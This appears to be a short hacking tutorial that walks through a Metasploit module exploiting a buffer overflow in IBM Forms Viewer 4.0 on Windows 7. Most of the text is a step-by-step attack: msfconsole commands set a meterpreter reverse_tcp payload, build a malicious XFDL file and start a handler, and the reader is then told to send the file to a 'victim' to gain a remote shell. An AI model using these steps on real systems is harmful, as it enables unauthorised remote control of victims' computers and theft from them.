Hack Remote Windows 7 PC Using IBM Forms Viewer Unicode Buffer Overflow

[jorgelm]

This module exploits a stack-based buffer overflow in IBM Forms Viewer. The vulnerability is due to a dangerous usage of strcpy-like function, and occurs while parsing malformed XFDL files, with a long fontname value. This module has been tested successfully on IBM Forms Viewer 4.0 on Windows XP SP3 and Windows 7 SP1.

Exploit Targets

Windows 7

IBM Forms Viewer 4.0

Requirement

Attacker: Kali Linux

Victim PC: Windows 7

Open Kali Linux terminal type msfconsole

Now type use exploit/windows/fileformat/ibm_forms_viewer_fontname

msf exploit (ibm_forms_viewer_fontname)>set payload windows/meterpreter/reverse_tcp

msf exploit (ibm_forms_viewer_fontname)>set lhost 192.168.1.113 (IP of Local Host)

msf exploit (ibm_forms_viewer_fontname)>exploit

After we successfully generate the malicious xfdlFile, it will stored on your local computer

/root/.msf4/local/msf.xfdl

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.113

exploit

Now send your msf.xfdl files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.